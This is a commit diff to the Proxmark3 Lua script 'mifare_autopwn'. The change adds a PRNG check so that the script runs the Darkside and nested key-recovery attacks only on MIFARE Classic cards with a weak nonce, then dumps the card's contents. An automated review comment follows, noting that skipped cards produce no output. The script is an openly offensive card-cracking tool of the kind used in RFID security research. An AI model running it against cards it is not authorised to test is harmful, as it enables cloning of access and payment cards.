chg: 'script run mifare_autopwn' added the prng_test, to make sure it only attacks weak cards.

This commit is contained in:
iceman1001 2017-07-31 15:53:26 +02:00
commit 6df9012de5


@ -26,25 +26,23 @@ Output files from this operation:
-- Some utilities -- Some utilities
------------------------------- -------------------------------
local DEBUG = false local DEBUG = false
local MIFARE_AUTH_KEYA = 0x60
local MIFARE_AUTH_KEYB = 0x61
--- ---
-- A debug printout-function -- A debug printout-function
function dbg(args) local function dbg(args)
if DEBUG then if DEBUG then
print(":: ", args) print(":: ", args)
end end
end end
--- ---
-- This is only meant to be used when errors occur -- This is only meant to be used when errors occur
function oops(err) local function oops(err)
print("ERROR: ",err) print("ERROR: ",err)
return nil,err return nil,err
end end
--- ---
-- Usage help -- Usage help
function help() local function help()
print(desc) print(desc)
print("Example usage") print("Example usage")
print(example) print(example)
@ -54,7 +52,7 @@ end
-- Waits for a mifare card to be placed within the vicinity of the reader. -- Waits for a mifare card to be placed within the vicinity of the reader.
-- @return if successfull: an table containing card info -- @return if successfull: an table containing card info
-- @return if unsuccessfull : nil, error -- @return if unsuccessfull : nil, error
function wait_for_mifare() local function wait_for_mifare()
while not core.ukbhit() do while not core.ukbhit() do
res, err = reader.read1443a() res, err = reader.read1443a()
if res then return res end if res then return res end
@ -63,7 +61,7 @@ function wait_for_mifare()
return nil, "Aborted by user" return nil, "Aborted by user"
end end
function nested(key,sak) local function nested(key,sak)
local typ = 1 local typ = 1
if 0x18 == sak then --NXP MIFARE Classic 4k | Plus 4k | Ev1 4k if 0x18 == sak then --NXP MIFARE Classic 4k | Plus 4k | Ev1 4k
typ = 4 typ = 4
@ -82,7 +80,7 @@ function nested(key,sak)
core.console(cmd) core.console(cmd)
end end
function dump(uid) local function dump(uid)
core.console("hf mf dump") core.console("hf mf dump")
-- Save the global args, those are *our* arguments -- Save the global args, those are *our* arguments
local myargs = args local myargs = args
@ -97,10 +95,22 @@ function dump(uid)
-- Set back args. Not that it's used, just for the karma... -- Set back args. Not that it's used, just for the karma...
args = myargs args = myargs
end end
--
-- performs a test if tag nonce uses weak or hardend prng
local function perform_prng_test()
local isweak = core.detect_prng()
if isweak == 1 then
dbg('PRNG detection : WEAK nonce detected')
return true
end
dbg('PRNG detection : HARDEND nonce detected')
return false
end
--- ---
-- The main entry point -- The main entry point
function main(args) local function main(args)
local verbose, exit, res, uid, err, _, sak local verbose, exit, res, uid, err, _, sak
local seen_uids = {} local seen_uids = {}
@ -121,33 +131,40 @@ function main(args)
-- Seen already? -- Seen already?
uid = res.uid uid = res.uid
sak = res.sak sak = res.sak
if not seen_uids[uid] then if not seen_uids[uid] then
-- Store it -- Store it
seen_uids[uid] = uid seen_uids[uid] = uid
print("Card found, commencing crack on UID", uid)
-- Crack it -- check if PRNG is WEAK
local key, cnt if perform_prng_test() then
err, res = core.mfDarkside() print("Card found, commencing crack on UID", uid)
if err == -1 then return oops("Button pressed. Aborted.") -- Crack it
elseif err == -2 then return oops("Card is not vulnerable to Darkside attack (doesn't send NACK on authentication requests).") local key, cnt
elseif err == -3 then return oops("Card is not vulnerable to Darkside attack (its random number generator is not predictable).") err, res = core.mfDarkside()
elseif err == -4 then return oops([[ if err == -1 then return oops("Button pressed. Aborted.")
Card is not vulnerable to Darkside attack (its random number generator seems to be based on the wellknown elseif err == -2 then return oops("Card is not vulnerable to Darkside attack (doesn't send NACK on authentication requests).")
generating polynomial with 16 effective bits only, but shows unexpected behaviour.]]) elseif err == -3 then return oops("Card is not vulnerable to Darkside attack (its random number generator is not predictable).")
elseif err == -5 then return oops("Aborted via keyboard.") elseif err == -4 then return oops([[
end Card is not vulnerable to Darkside attack (its random number generator seems to be based on the wellknown
-- The key is actually 8 bytes, so a generating polynomial with 16 effective bits only, but shows unexpected behaviour.]])
-- 6-byte key is sent as 00XXXXXX elseif err == -5 then return oops("Aborted via keyboard.")
-- This means we unpack it as first end
-- two bytes, then six bytes actual key data -- The key is actually 8 bytes, so a
-- We can discard first and second return values -- 6-byte key is sent as 00XXXXXX
_,_,key = bin.unpack("H2H6",res) -- This means we unpack it as first
print("Found valid key: "..key); -- two bytes, then six bytes actual key data
-- We can discard first and second return values
_,_,key = bin.unpack("H2H6",res)
print("Found valid key: "..key);
-- Use nested attack -- Use nested attack
nested(key,sak) nested(key,sak)
-- Dump info -- Dump info
dump(uid) dump(uid)
end
print_message = true print_message = true
end end
end end
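Review bot: A card that fails the new PRNG pre-check is skipped with no user-visible output in main's new branch, because the only diagnostic is the `dbg(...)` call inside perform_prng_test and `DEBUG` is `false` by default; the UID is still recorded in `seen_uids`, so the card is never retried and the user just sees silence. I would give the `if perform_prng_test() then` block an else branch, e.g. `else print("Card found, but its PRNG looks hardened - skipping UID", uid)`, so the skip is reported on the console like the "Card found, commencing crack" line is. Note also that perform_prng_test treats any return value other than `1` from `core.detect_prng()` — including `nil` if that call fails — as "hardened"; if detect_prng can report an error through its return value, it would be worth distinguishing that from a genuinely hardened card instead of silently skipping, though its contract is not visible here. main's body starts before and continues after this hunk.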